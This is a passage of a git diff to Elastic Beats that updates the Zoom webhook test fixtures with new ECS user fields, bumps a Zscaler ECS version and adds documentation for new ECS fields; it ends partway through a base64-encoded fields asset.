Title", @@ -139,6 +255,7 @@ "forwarded" ], "url.full": "https://zoom.us/recording/share/aaaaaannnnnldglrkgmrmhh", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 1, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -177,6 +294,7 @@ "forwarded" ], "url.full": "https://zoom.us/recording/share/aaaaaannnnnldglrkgmrmhh", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 1, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -215,6 +333,7 @@ "forwarded" ], "url.full": "https://zoom.us/recording/share/aaaaaannnnnldglrkgmrmhh", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 1, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -253,6 +372,7 @@ "forwarded" ], "url.full": "https://zoom.us/recording/share/aaaaaannnnnldglrkgmrmhh", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 1, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -283,13 +403,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 120, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -322,13 +446,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 120, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -361,13 +489,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 120, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", diff --git a/x-pack/filebeat/module/zoom/webhook/test/user.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/user.ndjson.log-expected.json index 3921a3c71041..f643dda0471b 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/user.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/user.ndjson.log-expected.json @@ -1,15 +1,15 @@ [ { "event.action": "user.created", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" ], "event.module": "zoom", "event.timezone": "-02:00", - "event.type": [ - "iam" - ], "fileset.name": "webhook", "input.type": "log", "log.offset": 0, @@ -23,6 +23,10 @@ "zoom-webhook", "forwarded" ], + "user.email": "anawesomeuser@email.com", + "user.target.email": "henrysemail@email.com", + "user.target.full_name": "Henry Phan", + "user.target.id": "abcD3ojfdbjfg", "zoom.account_id": "AAAAAA", "zoom.creation_type": "create", "zoom.operator": "anawesomeuser@email.com", @@ -34,6 +38,9 @@ }, { "event.action": "user.invitation_accepted", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -41,7 +48,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation" ], "fileset.name": "webhook", @@ -57,6 +63,9 @@ "zoom-webhook", "forwarded" ], + "user.email": "maria@maria.developer.dfgfdgf", + "user.full_name": "Maria CoolPerson", + "user.id": "sbyjt3ODg", "zoom.account_id": "EPjyjVYxHMA", "zoom.user.email": "maria@maria.developer.dfgfdgf", "zoom.user.first_name": "Maria", @@ -66,6 +75,9 @@ }, { "event.action": "user.updated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -73,7 +85,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -91,6 +102,9 @@ "zoom-webhook", "forwarded" ], + "user.email": "shrija2016+dev_ma@gmail.com", + "user.id": "uLobbbbbbbb_qQsQ", + "user.target.id": "uLobbbbbbbb_qQsQ", "zoom.account_id": "lAA_EBBBBBBB", "zoom.old_values.company": "NotZoom", "zoom.old_values.id": "uLobbbbbbbb_qQsQ", @@ -102,7 +116,8 @@ { "event.action": "user.settings_updated", "event.category": [ - "configuration" + "configuration", + "iam" ], "event.dataset": "zoom.webhook", "event.kind": [ @@ -111,7 +126,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -129,6 +143,9 @@ "zoom-webhook", "forwarded" ], + "user.email": "iamtheoperator@gmail.com", + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", + "user.target.id": "uL34AAbbbbAAAAAAQsQ", "zoom.account_id": "CAl6ByEyAq8KK_CCCCCC", "zoom.old_values.id": "uL34AAbbbbAAAAAAQsQ", "zoom.old_values.settings.in_meeting.private_chat": true, @@ -140,7 +157,8 @@ { "event.action": "user.settings_updated", "event.category": [ - "configuration" + "configuration", + "iam" ], "event.dataset": "zoom.webhook", "event.kind": [ @@ -149,7 +167,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -167,6 +184,9 @@ "zoom-webhook", "forwarded" ], + "user.email": "somememail@randommailer28.com", + "user.id": "fdhjfdhsj536274gfd", + "user.target.id": "fdhjfdhsj536274gfd", "zoom.account_id": "EPbbbbb@@@@@2sfdfdA", "zoom.old_values.id": "fdhjfdhsj536274gfd", "zoom.old_values.settings.meeting_authentication": true, @@ -177,6 +197,9 @@ }, { "event.action": "user.deactivated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -184,7 +207,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -202,6 +224,11 @@ "zoom-webhook", "forwarded" ], + "user.email": "anawesomeuser@email.com", + "user.id": "z8yCxjabcdEFGHfp8uQ", + "user.target.email": "henrysemail@email.com", + "user.target.full_name": "Henry Phan", + "user.target.id": "abcD3ojfdbjfg", "zoom.account_id": "AAAAAABBBB", "zoom.operator": "anawesomeuser@email.com", "zoom.operator_id": "z8yCxjabcdEFGHfp8uQ", @@ -213,6 +240,9 @@ }, { "event.action": "user.activated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -220,7 +250,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -238,6 +267,11 @@ "zoom-webhook", "forwarded" ], + "user.email": "anawesomeuser@email.com", + "user.id": "z8yCxjabcdEFGHfp8uQ", + "user.target.email": "henrysemail@email.com", + "user.target.full_name": "Henry Phan", + "user.target.id": "abcD3ojfdbjfg", "zoom.account_id": "AAAAAABBBB", "zoom.operator": "anawesomeuser@email.com", "zoom.operator_id": "z8yCxjabcdEFGHfp8uQ", @@ -249,6 +283,9 @@ }, { "event.action": "user.disassociated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -256,7 +293,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -274,6 +310,11 @@ "zoom-webhook", "forwarded" ], + "user.email": "anawesomeuser@email.com", + "user.id": "z8yCxjabcdEFGHfp8uQ", + "user.target.email": "henrysemail@email.com", + "user.target.full_name": "Henry Phan", + "user.target.id": "abcD3ojfdbjfg", "zoom.account_id": "AAAAAABBBB", "zoom.operator": "anawesomeuser@email.com", "zoom.operator_id": "z8yCxjabcdEFGHfp8uQ", @@ -285,6 +326,9 @@ }, { "event.action": "user.deleted", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -292,7 +336,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "deletion" ], @@ -310,6 +353,11 @@ "zoom-webhook", "forwarded" ], + "user.email": "anawesomeuser@email.com", + "user.id": "z8yCxjabcdEFGHfp8uQ", + "user.target.email": "henrysemail@email.com", + "user.target.full_name": "Henry Phan", + "user.target.id": "abcD3ojfdbjfg", "zoom.account_id": "AAAAAABBBB", "zoom.operator": "anawesomeuser@email.com", "zoom.operator_id": "z8yCxjabcdEFGHfp8uQ", @@ -321,6 +369,9 @@ }, { "event.action": "user.presence_status_updated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -328,7 +379,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -345,6 +395,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "sfdhfghfgh@dkjdfd.com", + "user.id": "z8ycx1223fq", "zoom.account_id": "EPjfyjxHMA", "zoom.user.email": "sfdhfghfgh@dkjdfd.com", "zoom.user.id": "z8ycx1223fq", @@ -352,6 +404,9 @@ }, { "event.action": "user.personal_notes_updated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -359,7 +414,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -376,6 +430,10 @@ "zoom-webhook", "forwarded" ], + "user.email": "sdfsgdfg@fjghg.ghm", + "user.id": "z8aggp8uq", + "user.target.email": "sdfsgdfg@fjghg.ghm", + "user.target.id": "z8aggp8uq", "zoom.account_id": "EPfhhdrYxHMA", "zoom.old_values.personal_notes": "this is the old note", "zoom.user.email": "sdfsgdfg@fjghg.ghm", @@ -384,6 +442,9 @@ }, { "event.action": "user.signed_in", + "event.category": [ + "authentication" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -391,7 +452,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "authentication", "creation", "start" ], @@ -408,6 +468,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "awesomeuser@awesomemeail.ghkgf", + "user.id": "djkglfdgkjdflghfdpe", "zoom.account_id": "dsjfosdfpdosgifdjg", "zoom.user.client_type": "android", "zoom.user.email": "awesomeuser@awesomemeail.ghkgf", @@ -416,6 +478,9 @@ }, { "event.action": "user.signed_out", + "event.category": [ + "authentication" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -423,7 +488,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "authentication", "creation", "end" ], @@ -440,6 +504,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "awesomeuser@awesomemeail.ghkgf", + "user.id": "djkglfdgkjdflghfdpe", "zoom.account_id": "dsjfosdfpdosgifdjg", "zoom.user.client_type": "android", "zoom.user.email": "awesomeuser@awesomemeail.ghkgf", diff --git a/x-pack/filebeat/module/zoom/webhook/test/webinar.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/webinar.ndjson.log-expected.json index 1bef0aa4e152..0c59a8beb21a 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/webinar.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/webinar.ndjson.log-expected.json @@ -17,7 +17,6 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLoRgfbbTayCX6r2Q_qQsQ", "uLoRgfbbTayCX6r2Q_qQsQ" ], "service.type": "zoom", @@ -25,6 +24,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.operator_id": "uLoRgfbbTayCX6r2Q_qQsQ", @@ -62,6 +63,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", + "user.id": "BBBBBBBBBB", "zoom.account_id": "AAAAAAAAAAA", "zoom.old_values.id": 155184668, "zoom.old_values.join_url": "https://zoom.us/j/00000000", @@ -97,7 +100,6 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLoRgfbbTayCX6r2Q_qQsQ", "uLoRgfbbTayCX6r2Q_qQsQ" ], "service.type": "zoom", @@ -105,6 +107,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.operator_id": "uLoRgfbbTayCX6r2Q_qQsQ", @@ -142,6 +146,7 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.webinar.duration": 0, @@ -178,6 +183,7 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.webinar.duration": 0, @@ -241,13 +247,16 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "z8yCxTTTTSiw02QgCAp8uQ" + "z8yCxTTTTSiw02QgCAp8uQ", + "s0AAAASoSE1V8KIFOCYw" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.full_name": "Arya Arya", + "user.id": "s0AAAASoSE1V8KIFOCYw", "zoom.account_id": "EPeQtiABC000VYxHMA", "zoom.participant.id": "s0AAAASoSE1V8KIFOCYw", "zoom.participant.sharing_details.content": "application", @@ -284,13 +293,16 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "z8yCxTTTTSiw02QgCAp8uQ" + "z8yCxTTTTSiw02QgCAp8uQ", + "s0AAAASoSE1V8KIFOCYw" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.full_name": "Arya Arya", + "user.id": "s0AAAASoSE1V8KIFOCYw", "zoom.account_id": "EPeQtiABC000VYxHMA", "zoom.participant.id": "s0AAAASoSE1V8KIFOCYw", "zoom.participant.sharing_details.content": "application", @@ -327,13 +339,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.registrant.address": "", "zoom.registrant.city": "", @@ -383,13 +399,17 @@ "observer.vendor": "Zoom", "related.user": [ "Lobbbbbbbbbb_qQsQ", - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.operator": "somemail@email.com", "zoom.operator_id": "Lobbbbbbbbbb_qQsQ", @@ -425,13 +445,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.operator": "coolemail@email.com", "zoom.registrant.email": "coolemail@email.com", @@ -465,13 +489,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.operator": "coolemail@email.com", "zoom.registrant.email": "coolemail@email.com", @@ -504,13 +532,16 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLoRgfbbTayCX6r2Q_qQsQ" + "uLoRgfbbTayCX6r2Q_qQsQ", + "iFxeBPYun6SAiWUzBcEkX" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.full_name": "shree", + "user.id": "iFxeBPYun6SAiWUzBcEkX", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.participant.id": "iFxeBPYun6SAiWUzBcEkX", @@ -543,13 +574,16 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLoRgfbbTayCX6r2Q_qQsQ" + "uLoRgfbbTayCX6r2Q_qQsQ", + "iFxeBPYun6SAiWUzBcEkX" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.full_name": "shree", + "user.id": "iFxeBPYun6SAiWUzBcEkX", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.participant.id": "iFxeBPYun6SAiWUzBcEkX", diff --git a/x-pack/filebeat/module/zscaler/zia/config/input.yml b/x-pack/filebeat/module/zscaler/zia/config/input.yml index c24ac2c43d08..cf61c0a28f7d 100644 --- a/x-pack/filebeat/module/zscaler/zia/config/input.yml +++ b/x-pack/filebeat/module/zscaler/zia/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/functionbeat/docs/fields.asciidoc b/x-pack/functionbeat/docs/fields.asciidoc index d3eef749804c..4da5e8283925 100644 --- a/x-pack/functionbeat/docs/fields.asciidoc +++ b/x-pack/functionbeat/docs/fields.asciidoc @@ -2040,7 +2040,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -2093,7 +2093,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -3284,6 +3284,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -4358,6 +4371,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -4528,6 +4554,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -7679,6 +7718,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -7854,6 +7894,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -7864,6 +8017,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -7967,6 +8233,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -8083,6 +8462,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- diff --git a/x-pack/functionbeat/include/fields.go b/x-pack/functionbeat/include/fields.go index 8b3b7c24a1e7..5ff059a6edda 100644 --- a/x-pack/functionbeat/include/fields.go +++ b/x-pack/functionbeat/include/fields.go @@ -19,5 +19,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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